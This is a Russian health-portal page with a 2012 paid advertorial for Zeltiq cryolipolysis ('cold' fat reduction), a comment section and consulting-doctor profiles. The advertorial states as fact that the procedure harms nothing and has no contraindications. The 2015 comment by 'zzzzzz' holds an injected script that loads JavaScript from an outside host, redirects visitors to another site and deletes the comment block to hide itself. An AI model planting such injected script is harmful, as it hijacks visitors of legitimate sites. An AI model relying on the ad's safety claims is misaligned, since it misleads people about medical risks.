Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Холод избавит от лишнего ...  >>  Холод избавит от лишнего веса
 
Обратная связь
 

Холод избавит от лишнего веса

Размер шрифта
23 марта 2012 00:00
  • google_analytics: false
  • Нравится

Что делать, если времени на фитнес-клуб нет, а хочется быть подтянутой и выглядеть моложе паспортного возраста? Вам поможет криолиполиз, или «холодовая пластика».

1

Жировые клетки очень чувствительны к холоду. Эта их особенность легла в основу нового метода, который при воздействии холода позволяет избавиться от лишних складок на боках, бедрах и ягодицах. Метод называется криолиполиз. Выполняется криолиполиз на специальном аппарате, Zeltiq, который, как хороший скульптор, отсекая все лишнее под действием холода.

zeltiq

Охлаждается не весь организм, а конкретная жировая складка. Она втягивается в аппликатор под действием вакуума и обрабатывается холодом в течение часа.

Всего один час — и необратимый процесс ускоренной, но естественной гибели жировых клеток запущен!

Результаты появятся не сразу, только через 2-2,5 месяца. За это время каждая обработанная холодом жировая складка потеряет до 25% своего объема.

Послк процедуры

Такое спокойное похудение без лишнего стресса не принесет вреда организму, а результат превзойдет ожидания. Кожа бывшей жировой складки успеет приспособиться к вашим новым формам и останется упругой и гладкой.

При этом «холодовой скульптор» Zeltiq не имеет противопоказаний, а сама процедура не требует реабилитационного периода.

Подробнее о процедуре криолиполиза на аппарате Zeltiq читайте здесь

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.